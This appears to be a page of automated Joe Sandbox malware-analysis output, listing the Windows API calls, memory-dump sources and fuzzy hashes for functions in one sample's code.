Download Yara Rule

APIs

Part of subcall function 00411743: ??2@YAPAXI@Z.MSVCRT(00000004,0041E844,004065C3,00000000,0041E844,0041E844), ref: 0041174B

Part of subcall function 00404E67: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FDA
Part of subcall function 00404E67: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FE2
Part of subcall function 00404E67: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FEA

??3@YAXPAX@Z.MSVCRT(?), ref: 00405445

Part of subcall function 0040976C: wvsprintfW.USER32(?,00000000,?), ref: 0040978F
Part of subcall function 0040976C: GetLastError.KERNEL32 ref: 004097A0
Part of subcall function 0040976C: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00920F20), ref: 004097C8
Part of subcall function 0040976C: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00920F20), ref: 004097DD
Part of subcall function 0040976C: lstrlenW.KERNEL32(?), ref: 004097F0
Part of subcall function 0040976C: lstrlenW.KERNEL32(?), ref: 004097F7
Part of subcall function 0040976C: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040980C
Part of subcall function 0040976C: lstrcpyW.KERNEL32(00000000,?), ref: 00409822
Part of subcall function 0040976C: lstrcpyW.KERNEL32(-00000002,?), ref: 00409834
Part of subcall function 0040976C: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040983E
Part of subcall function 0040976C: LocalFree.KERNEL32(?), ref: 00409847

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 3247304187-0
Opcode ID: c811e019901b6a811436f6386d28b0397ed2eab7dc28481a84a831be7bbca114
Instruction ID: c8cfcf64f4d727165aa460a5e60b04b55843b987d0c6720e9ddf697575640f7a
Opcode Fuzzy Hash: c811e019901b6a811436f6386d28b0397ed2eab7dc28481a84a831be7bbca114
Instruction Fuzzy Hash: CD019271504619AEEF10AA6598C1AFF7368EB0034CF10447FF612372C2DA795D898E5A

Function 0041817D Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00418182

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: afbb77ebcebef81e2cf385e1134c7783f6bd7d92ebd3f59a0857a247aa1f2ec6
Instruction ID: 41c31309152594a5cdc9a94e22e8fdd470941a79d1f82a5d583071a5725c450b
Opcode Fuzzy Hash: afbb77ebcebef81e2cf385e1134c7783f6bd7d92ebd3f59a0857a247aa1f2ec6
Instruction Fuzzy Hash: 77F0FF32400248FFDB21CF88C845BDEBBB1EF40324F04865EF80562250C3BDAA90CBA9

Function 004026DD Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00402728

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e30c021431c8dc767e28d2db58534a27e2d4e67a42e3bcdc1a5b57926e33b774
Instruction ID: bda90a93fc5a79562ae67f98b1e8df01e77ba5ebef7748c498c118ca2824b36e
Opcode Fuzzy Hash: e30c021431c8dc767e28d2db58534a27e2d4e67a42e3bcdc1a5b57926e33b774
Instruction Fuzzy Hash: C4F01731100601DBDB61DF69C988B97B7F4BF48345F04492EE48AE76E0D7B9E885CB19

Function 00411292 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000008,00000000,?,00000000,00000000,00000008,?,004112EE,00000000,?,00000000,00000000,00000000,?,004124B8,?), ref: 004112B5

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3823a46a90e705b780842d9b9d1914895d37d3d957bde1875c21ce7738ae9c40
Instruction ID: 0023b8de25620b55143802bd0f89cc8c2b593093c471a7488b0b9917581c8630
Opcode Fuzzy Hash: 3823a46a90e705b780842d9b9d1914895d37d3d957bde1875c21ce7738ae9c40
Instruction Fuzzy Hash: F0E0E575A41209FFDB00CF95D801BDE7BF9EB48354F50C069F9189A260D379AA50DF54

Function 00411359 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041115B: CloseHandle.KERNELBASE(0041E7B8,00000014,00411364,00000000,?,004113AA,0041E7B8,80000000,00000000,00000000,00000000,004113CD,00000000,0041E7B8,00000003,00000080), ref: 00411166

CreateFileW.KERNELBASE(0041E7B8,00409A47,00000000,00000000,0041E7B8,004113DB,00000000,00000000,?,004113AA,0041E7B8,80000000,00000000,00000000,00000000,004113CD), ref: 0041137B

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 80b8b5df33a30570d28e0a343dc471cf771b25124c2d66bbf4d53c6fd93a2205
Instruction ID: 7f7215a53688679663676b47c899f3015bbad9dd6bad72367c24d06892668cc0
Opcode Fuzzy Hash: 80b8b5df33a30570d28e0a343dc471cf771b25124c2d66bbf4d53c6fd93a2205
Instruction Fuzzy Hash: 70E08632000219BBCF111FA49C02BCA3F66AF09360F104626FB11561F1C776C4B0AB94

Function 0041883F Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00418844

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6dcfb0b3f8ff67c5fe89e3e4baa8ae41fa6805a61c95a6512c09056436acd5ff
Instruction ID: 85b5f634bb3876c881f9a369785aad2c034a51649cb27cc2246a7d4990ba049a
Opcode Fuzzy Hash: 6dcfb0b3f8ff67c5fe89e3e4baa8ae41fa6805a61c95a6512c09056436acd5ff
Instruction Fuzzy Hash: 7BE08671900214ABD7149B8AC8077DEBB78EB40765F10425FF01162280D7782E008568

Function 004071A3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 004071B6

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: _beginthreadex
String ID:
API String ID: 3014514943-0
Opcode ID: 0249f964b4c06bf6ddaf9ed2643bfe3927903dc7b70e5f300a9eb7fd59aeab1f
Instruction ID: 2aa1260f39b219495775a5a96dce83a8c9144485e5dc473d2f94c266e6d0d9a7
Opcode Fuzzy Hash: 0249f964b4c06bf6ddaf9ed2643bfe3927903dc7b70e5f300a9eb7fd59aeab1f
Instruction Fuzzy Hash: 73D05EB29002087FDB00AFA4DC05CBB7A9CDA45260700843ABD48CB301E5729E6087E5

Function 00411222 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00411238

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 39bbe8b1e9019e7b2d5fad33dac547c7575ae00130540e2fd0b68d00fb51dad4
Instruction ID: 592777a0cbf9ed61c554e453f95aac0b5ff3b8d945bf09df7fedf92081e1879d
Opcode Fuzzy Hash: 39bbe8b1e9019e7b2d5fad33dac547c7575ae00130540e2fd0b68d00fb51dad4
Instruction Fuzzy Hash: 14E0EC75201208FFDB01CF90CD01FDE7BBEEB49758F208058E90496160C7769A20EB55

Function 00411265 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,0041128F,00000000,00000000,?,0040270B,?), ref: 00411273

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 5e2c3f4fd95572551ce7389ed7a8d0418e4bf28c6d4fd737443a5967939eb4fb
Instruction ID: 14e9d413570242a207ede0755a0e187765c1d7efe63821fc46ad5d1f7ad43643
Opcode Fuzzy Hash: 5e2c3f4fd95572551ce7389ed7a8d0418e4bf28c6d4fd737443a5967939eb4fb
Instruction Fuzzy Hash: 23C04C36159105FFCF020FB0CC04C1ABFA2BB99311F10C918B159C4070C7328038EB02

Function 00401341 Relevance: 1.3, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(0000000C,?,00000000,004067DF,?,00000000), ref: 00401354

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 6de0e411032e451e504fc76718b12b47332f52b8bf215be46ff0267bd0230b75
Instruction ID: 9b740768f600bbd434f173913778787e3c0435d902e00cab9e4412b019abca16
Opcode Fuzzy Hash: 6de0e411032e451e504fc76718b12b47332f52b8bf215be46ff0267bd0230b75
Instruction Fuzzy Hash: 7FF02270104210AFD7188B65D84EC97B7E8EF85320305C4AEF81ACB3A1D778EC82C6A4

Function 004122B3 Relevance: 1.3, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?), ref: 004122E0

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: d509e3b73838843a45d009e079e0ca887772c46ed55d806236c8cbc1e203ec92
Instruction ID: 6d5529d2897140aadd979f9f6666313ec97981f96f3cf44ff7ecc7f719b31ebf
Opcode Fuzzy Hash: d509e3b73838843a45d009e079e0ca887772c46ed55d806236c8cbc1e203ec92
Instruction Fuzzy Hash: 3AF06D7120020ADBCB248E64C900AFB7765FF00314F10496AED16D6660D3BDE8A6DB59

Function 00411972 Relevance: 1.3, APIs: 1, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00411BCA,?,?,00000000,004025B9,?,?,0041E788,0040297D,00000000,?,0040508D,?), ref: 0041198F

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: e62b0a091c70a990ef5259a957749949a312ccd1e08ac78a8b9f9005f8eb361d
Instruction ID: c6dd757af0c1ba279d4dea7c6a80b7e4f73fa27ff16b3e9179e8d8f42dc612cd
Opcode Fuzzy Hash: e62b0a091c70a990ef5259a957749949a312ccd1e08ac78a8b9f9005f8eb361d
Instruction Fuzzy Hash: ABE01D735052015FD3248F2DD507657F7E9DFD0320F14C52FD596C7290DB74A4818554

Function 00402963 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,?,0040508D,?,?,?,00000000,?,?,?,?,?,?,?,?,004055D0), ref: 00402968

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: bb81aa1edb6922299d1acbfae398dae3b7c7bca9dc960b94ece09830f4446531
Instruction ID: 3c4924e632bf8de9284e3dfcfd8e31cb7db5e3eb6efac072798042e24d92b66a
Opcode Fuzzy Hash: bb81aa1edb6922299d1acbfae398dae3b7c7bca9dc960b94ece09830f4446531
Instruction Fuzzy Hash: 26D0A96270421232DA542136192A9AF04850BA1324B04083FBC09BA2D0DDBCCC82929D

Function 0041115B Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(0041E7B8,00000014,00411364,00000000,?,004113AA,0041E7B8,80000000,00000000,00000000,00000000,004113CD,00000000,0041E7B8,00000003,00000080), ref: 00411166

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 07fcbf98cd6418257f68abd7a88b9ae89250d8f7ef7824f403ab4521d4148bf0
Instruction ID: 054d9df42e2342d198a541279ff18f785dd1647d9572a3c5038800ec3afc9341
Opcode Fuzzy Hash: 07fcbf98cd6418257f68abd7a88b9ae89250d8f7ef7824f403ab4521d4148bf0
Instruction Fuzzy Hash: 0FD01231144521668A641F3C78485D273D86E07330731175AF1B0C33F0D3648CC34654

Function 00418E90 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004126A3), ref: 00418EA1

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cfd591f57166502c3996eeb52ba497cf8e1c0d4e19f98a0caefb48489f851d59
Instruction ID: 571c065075a9a1381f58638ba6fca5ee0bdf2100e8ed77eb0067926671c236e0
Opcode Fuzzy Hash: cfd591f57166502c3996eeb52ba497cf8e1c0d4e19f98a0caefb48489f851d59
Instruction Fuzzy Hash: C3B012B07E234035FE684F204C0BFE729106344B5BF10806CB305E80C4EBD45440501D

Function 00418E60 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00418E68

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

